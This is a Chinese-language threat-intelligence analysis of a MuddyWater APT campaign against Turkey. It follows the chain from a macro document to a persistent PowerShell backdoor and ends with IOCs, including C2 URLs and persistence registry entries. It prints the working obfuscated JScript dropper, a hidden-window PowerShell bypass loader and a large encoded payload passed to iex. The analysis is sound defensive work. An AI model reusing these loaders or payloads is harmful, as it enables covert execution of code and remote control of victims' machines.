0x1 概况
近日腾讯御见威胁情报中心再次捕获到MuddyWater(污水) APT组织的一例攻击样本,与2018年3月份捕获到样本相比,本次攻击的的目标依然是土耳其。本次攻击时依然使用了宏文档进行载荷投递,宏文档中嵌入了一图标文件,图标中的关键字为“mersin emniyet müdürlüğü”,通过搜索引擎查询发现这图标为土耳其相关部门的图标,可以推测此次可能是一次针对土耳其相关部门的定向攻击。
在攻击技术方面,该组织全程使用的是经过多次高度混淆的powershell脚本,与上次相比一些关键的木马功能变为了通过云控下发powershell脚本来触发,这样极大地增加了安全机构的取证难度。在c2方面,不像上次那样奢侈地使用了517个c2地址,本次只使用了3个。下面将对此次的攻击样本进行一次详细的分析。
(攻击流程图)
总结一下本次MuddyWater APT组织新样本的技术特点:
i. 攻击对象:土耳其相关部门,目的是接受云端控制,下载和释放后门,获取敏感信息;
ii. 使用多次高度混淆的PowerShell脚本;
iii. 一些关键的功能通过云控下发PowerShell脚本触发,行动极为隐蔽,难以捕捉;
iv. 本次捕获的样本只使用了3个C2地址;
v. 脚本运行后,会设置开机自启动、解密c2、创建任务计划、获取计算机信息等,然后不断地访问c2,等待和执行新指令。
0x2 载荷投递
宏文档中背景故意做得比较模糊,但土耳其启用宏的提示文字却异常鲜艳,这是一种典型的社会工程学式的攻击方式,目的是为了让受害者在好奇心的驱使下点击“启动内容”按钮,从而让藏在文档中的木马运行起来。
该诱饵文档中的vba脚本带有密码保护,当查看宏时会弹出输入密码的提示框,破解后我们拿到了高度混淆的vba脚本。
(vba脚本)
vba中有4处base64编码的字符串,经过解密后发现与释放在C:\ProgramData目录下的OneDrive.dll、OnDrive.html、OneDrive.ini中的内容一致。
(vba释放出来的文件)
vba中的4处base64编码如下所示:
(第1处base64)
(第2处base64)
(第3处base64)
(第4处base64)
0x3 RAT分析
OneDrive.html分析
此文件中的内容如下,看下去所上文的命令行“c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\OneDrive.html,OneDrive,1,”类似,都是为了实现常驻功能的。
(OneDrive.html中的内容)
OneDrive.dll分析
此dll中内容为js脚本,内容如下所示。
<?xml version="1.0" encoding="utf-8"?>
<package>
<component>
<registration prog>
<script language="JScript"><![CDATA[
var a=['wq3DhcOQw6A=','wr7CkMO7w5kVDUtTwr3DmwPCmQMcKC7CvcO/w6M0FmPCvcKtOMO8w4DCo8ONwp4Hw6RfFsOWPVJFw7EIwpA1B8Oxaglww4fDkmsEwphhSGNXNsOBw55owpFKwqfCuMK8wq8cwp7CnT/CghYBW8Kmw64DRWfCrcOcFSkVYMKYTFTDsT8aWUMlHXTCjMO4OhvDs0rCt0M1w7NIwrJMIBRMNmHDkwPDr8Otwo50w6tEBcKWwqNbwpIvSsOLwrpsw6tXfTLDgMO+wqPDiE0uwqlCIAHDlsOcP8O2woRrw7jCgsOnw5dnR8KAwpfDvQDCtcOaw6dbTnHDpcO1AcKXw6rCr07DmMOBDDtPwqpRBzHCqAUwWsOWw5gVMMK4QSleZHw8w7bDnMKjwoRRKExNZ8OhwqvDkMOVXcOYLcOkw4LDg8KLwqbDvzbDuAHCrA4Pw5lSKcK6ZRNrfHpGwr3DuhPDky07BMKRw41mwo9hw4PDn8KqAMOZIMOTZSUUw6JUwo7CgMOmwohqw7PDpsKeZwhywp7DoxQeXzN0wrXDnw8gw4MseTDCuHFTQzJYPEbCmMOMOjZGKsKaMlbCvcOlworCix/DkX3CpMKKNMKkw4PCpMK2wojCmw==','w53DoMKQIgTCqj7Cg8Oh','wrTDm3Q=','w6luw4jDkSXCksOnw4TDuW1bw4BVIsO2w6zChQrClnE=','X8K0NsO9woVWdDPDpQIqw7hUZg==','wpjCk0MpPsOWw73DmDVD','w7MnTlPCqcKYd8O1Bg==','w7zCrsOR','KXrDkcKffQZwdkl1eBx2','wqbCh8OIwofCtCU='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1c4));var b=function(c,d){c=c-0x0;var e=a[c];if(b['mtNPvA']===undefined){(function(){var f;try{var g=Function('return (function() '+'{}.constructor("return this")( )'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,s){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+s['charCodeAt'](A%s['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return w;};b['yrYnwx']=q;b['VjLgMC']={};b['mtNPvA']=!![];}var C=b['VjLgMC'][c];if(C===undefined){if(b['LYvtJw']===undefined){b['LYvtJw']=!![];}e=b['yrYnwx'](e,d);b['VjLgMC'][c]=e;}else{e=C;}return e;};var cm=b('0x0','1(n^');var w32ps=GetObject(b('0x1','@#1j'))[b('0x2','rZ%W')](b('0x3','CaVK'));w32ps[b('0x4','nOAS')]();w32ps[b('0x5','2*bW')]=0x0;var rtrnCode=GetObject(b('0x6','mISm'))[b('0x7','5Kh]')](b('0x8','q!&J'))[b('0x9','r@qO')](cm,b('0xa','1(n^'),w32ps,null);
]]></script>
</registration>
</component>
</package>
OneDrve.dll中的代码精简后变成如下所示,作用是利用powershell执行OneDrive.ini中的加密代码。
var cm='powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\OneDrive.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));'
var w32ps = GetObject('winmgmts:')['Get']('Win32_ProcessStartup');
w32ps['SpawnInstance_']();
w32ps['ShowWindow'] = 0x0;
var rtrnCode = GetObject('winmgmts:')['Get']()['Win32_Process'](cm,'c:\\' , w32ps, null);
OneDrive.ini分析
OneDrive.ini中内容解密出来后如下所示,为一段powershell脚本。
iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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
l/311/+Bw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
onedrive.ini中的powershell脚本先解压一段base64编码的脚本,然后再执行此脚本,解压后的powershell脚本如下所示(代码太长,只截取了部分),经过了好几层的高度混淆。
OneDriver.ini中的powershell脚本经过多次去混淆后,最终会得到powershell版的后门木马。
(最终的后门脚本)
后门木马功能分析
脚本运行后,会设置开机自启动、解密c2、创建任务计划、获取计算机信息等,然后不断地访问c2,等待和执行指令。
(脚本入口)
(禁用office安全项)
(开机自启动及任务计划)
(获取得计算机信息)
(将计算机信息的md5值当key)
(解密c2)
(http post)
(post的内容)
(请求服务器下发指令)
由于服务器返回的数据异常,后续只能通过阅读源码的方式分析部分功能。
(服务器返回的异常数据)
命令字:upload的功能其实是为了下载文件
命令字:cmd,主要是为了执行cmd命令
命令字:b64,其实是为了执行base64编码的powershell 脚本
命令字:muddy 主要功能是先把powershell脚本下载并存储到c:\programdata\LSASS 文件
中,再执行此文件中的脚本。下文图中的base64解码后为“-exec Bypass -c $s=(get-content c:\programdata\LSASS);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));”
0x4 总结
从MuddyWater组织近段时间的攻击活动来看,该组织一直喜欢用宏文档加powershell脚本的攻击手法。从本次的攻击样本来看,该组织依然手握大量的攻陷网站,用来进行诱饵的投递及胜利果实的回收,同时将真正核心的代码功能以云控的方式进行下发,以便掩盖其攻击目的。因此,我们提醒政府、企业等广大用户,切勿随意打开来历不明的文档,同时安装安全软件。对安全软件提醒发现陌生程序创建开机启动项,务必高度重视。
目前,腾讯御界高级威胁检测系统已经可以检测并阻断该轮攻击的连接行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
凭借基于行为的防护和智能模型两大核心能力,御界高级威胁检测系统可高效检测未知威胁,并通过对企业内外网边界处网络流量的分析,感知漏洞的利用和攻击。通过部署御界高级威胁检测系统,及时感知恶意流量,检测钓鱼网址和远控服务器地址在企业网络中的访问情况,保护企业网络安全。
0x5 IOCs
Md5:
5a42a712e3b3cfa1db32d9e3d832f8f1(doc)
6f1e84905f8d15269892026c0ab8d9a7(OneDrive.dll)
5a5b32e1ea053d5f76065cabe7e46851(OneDrive.html)
b96a0a71566a766589ba3c891f86ca3f(OneDrive.ini)
C2:
http://ektamservis.com/includes/main.php
http://www.cankayasrc.com/style/js/main.php
http://gtme.ae/font-awesome/css/main.php
开机自动项及任务计划:
HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run :OneDrives(开机自启动项)
HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run: OneDrives(开机自启动项)
“c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,OneDrive,1” ( 开机自启动项内容)
MicrosoftOneDrive(任务计划项)
“c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,Defender,1,”(任务计划内容)
MuddyWater(污水)APT组织以从事网络间谍活动为目的,受害者主要分布在巴基斯坦、沙特阿拉伯、阿联酋、伊拉克、土耳其等中东地区国家。
MuddyWater(污水)APT组织自2017年11月被曝光以来,擅长利用Powershell脚本作为后门程序频繁发起网络攻击,主要攻击目标集中在政府、金融、能源、电信等要害部门。
相关阅读:《近期“污水”(MuddyWater)APT组织攻击活动汇总》
http://www.freebuf.com/articles/web/165061.html
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)